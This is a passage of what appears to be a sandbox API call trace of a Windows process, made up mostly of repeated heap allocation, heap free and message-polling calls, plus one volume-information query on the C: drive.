dwFlags=0x0, lpMem=0x76a8b0 | out: hHeap=0x650000) returned 1 [0071.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a880 | out: hHeap=0x650000) returned 1 [0071.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a898 | out: hHeap=0x650000) returned 1 [0071.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ce88 | out: hHeap=0x650000) returned 1 [0071.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690610 | out: hHeap=0x650000) returned 1 [0071.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a898 | out: hHeap=0x650000) returned 1 [0071.692] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690640 | out: hHeap=0x650000) returned 1 [0071.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690630 | out: hHeap=0x650000) returned 1 [0071.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690640 | out: hHeap=0x650000) returned 1 [0071.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0071.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690650 | out: hHeap=0x650000) returned 1 [0071.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a8f8 | out: hHeap=0x650000) returned 1 [0071.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a8e0 | out: hHeap=0x650000) returned 1 [0071.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cf28 | out: hHeap=0x650000) returned 1 [0071.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690640 | out: hHeap=0x650000) returned 1 [0071.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690640 | out: hHeap=0x650000) returned 1 [0071.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a868 | out: hHeap=0x650000) returned 1 [0071.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a8c8 | out: hHeap=0x650000) returned 1 [0071.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a8e0 | out: hHeap=0x650000) returned 1 [0071.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cf00 | out: hHeap=0x650000) returned 1 [0071.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690630 | out: hHeap=0x650000) returned 1 [0071.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690630 | out: hHeap=0x650000) returned 1 [0071.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a8b0 | out: hHeap=0x650000) returned 1 [0071.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a880 | out: hHeap=0x650000) returned 1 [0071.692] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.692] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.693] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.693] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.693] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.693] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.693] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.693] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.693] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.693] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.693] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.693] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.693] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.693] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.693] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.693] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.693] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.693] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.693] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.693] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.693] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.693] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.693] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.693] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.693] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.693] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.693] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.693] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.693] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.693] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.694] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.694] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.694] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.694] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.694] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.694] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.694] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.694] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.694] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.694] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.694] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.694] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.694] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.694] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.694] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.694] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.694] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.694] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.694] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.694] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.694] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.694] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.694] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.694] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.694] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.694] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.694] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.694] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.695] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.695] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.695] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.695] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.695] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.695] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.695] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.695] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.695] CharUpperBuffW (in: lpsz="TRUE_HOMEDRIVE", cchLength=0xe | out: lpsz="TRUE_HOMEDRIVE") returned 0xe [0071.695] PeekMessageW (in: lpMsg=0x61f134, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f134) returned 0 [0071.697] PeekMessageW (in: lpMsg=0x61f134, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f134) returned 0 [0071.697] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x60f40c, nVolumeNameSize=0x7fff, lpVolumeSerialNumber=0x61f41c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x61f41c*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0071.698] GetLastError () returned 0x3f0 [0071.698] SetLastError (dwErrCode=0x3f0) [0071.698] GetLastError () returned 0x3f0 [0071.698] SetLastError (dwErrCode=0x3f0) [0071.698] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.698] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.698] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.698] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.698] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.698] QueryPerformanceFrequency (in: lpFrequency=0x61f3dc | out: lpFrequency=0x61f3dc*=100000000) returned 1 [0071.698] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.698] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cd98 [0071.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a670 [0071.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6905e0 [0071.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6905d0 [0071.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cdc0 [0071.699] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.699] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cf28 [0071.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a6d0 [0071.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690590 [0071.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0071.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cf50 [0071.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a778 [0071.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690640 [0071.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a748 [0071.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a8e0 [0071.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690630 [0071.699] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.699] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.699] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a8c8 [0071.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690690 [0071.699] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0071.699] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0071.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a910 [0071.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0071.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690690 [0071.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6906c0 [0071.700] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0071.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0071.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0071.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6906d0 [0071.700] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.700] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a910 [0071.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690680 [0071.700] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690680 [0071.700] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.700] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a910 [0071.701] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690680 [0071.701] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.701] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.701] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.701] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.701] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690680 [0071.701] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.701] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.701] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.701] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.701] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a910 [0071.701] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690680 [0071.701] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.701] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.701] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.701] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.701] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690680 [0071.701] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.701] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.701] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.701] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.701] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a910 [0071.701] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690680 [0071.701] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.701] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.701] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.701] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.701] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690680 [0071.701] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 